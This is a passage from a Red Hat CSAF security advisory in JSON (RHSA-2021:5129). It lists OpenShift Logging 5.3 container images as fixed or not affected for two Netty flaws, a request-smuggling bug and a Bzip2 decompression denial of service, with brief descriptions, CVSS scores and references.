"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", 
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1944888" } ], "notes": [ { "category": "description", "text": "A flaw was found in Netty. There is an issue where the content-length header is not validated correctly if the request uses a single Http2HeaderFrame with the endstream set to true. This flaw leads to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. The highest threat from this vulnerability is to integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty: Request smuggling via content-length header", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Satellite ships a vulnerable Netty version embedded in Candlepin. 
However, it is not directly vulnerable since the HTTP requests are handled by Tomcat and not by Netty.\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nIn OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec-http package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21409" }, { "category": "external", "summary": "RHBZ#1944888", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21409", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21409" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409" }, { "category": 
"external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32", "url": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32" } ], "release_date": "2021-03-30T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T19:37:00+00:00", "details": "For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5129" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", 
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty: Request smuggling via content-length header" }, { "cve": "CVE-2021-37136", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2004133" } ], "notes": [ { "category": "description", "text": "A flaw was found in Netty\u0027s netty-codec due to size restrictions for decompressed data in the Bzip2Decoder. By sending a specially-crafted input, a remote attacker could cause a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data", "title": "Vulnerability summary" }, { "category": "other", "text": "In the OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack ship the vulnerable version of netty-codec package. Since the release of OCP 4.6, the Metering product has been deprecated [1], so the affected components are marked as wontfix. This may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). 
The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37136" }, { "category": "external", "summary": "RHBZ#2004133", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37136", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37136" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136" }, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" } ], "release_date": "2021-09-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T19:37:00+00:00", "details": "For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata 
update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5129" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", 
